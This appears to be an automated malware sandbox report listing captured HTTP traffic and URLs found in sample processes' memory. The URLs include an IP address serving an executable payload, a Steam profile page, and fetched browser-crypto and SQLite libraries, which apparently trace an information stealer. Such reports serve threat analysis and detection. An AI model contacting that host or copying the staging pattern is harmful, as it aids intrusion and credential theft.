Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDmw_c^nUSssD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:27:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: 5876.exe, 00000007.00000003.2014729641.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/
Source: 5876.exe, 00000007.00000003.2014765574.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2014729641.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/N
Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1788178535.000000000085D000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2014765574.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1760169194.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1746306050.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1760479416.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1788207349.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2058603010.000000000085C000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1772605179.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2087586724.0000000000863000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152636525.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2014729641.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/file/host_so.exe
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000002.00000000.1403647144.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: explorer.exe, 00000002.00000000.1401095167.0000000004405000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobeS
Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: EE6.exe, 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000000.2053146567.00000000004B4000.00000002.00000001.01000000.00000008.sdmp, katDDA4.tmp.11.dr	String found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
Source: explorer.exe, 00000002.00000000.1402569420.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1402546303.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1400425752.0000000002C80000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 00000002.00000000.1403647144.0000000009237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: katDDA4.tmp, katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: katDDA4.tmp, 0000000C.00000002.2545656543.000000001DE0D000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
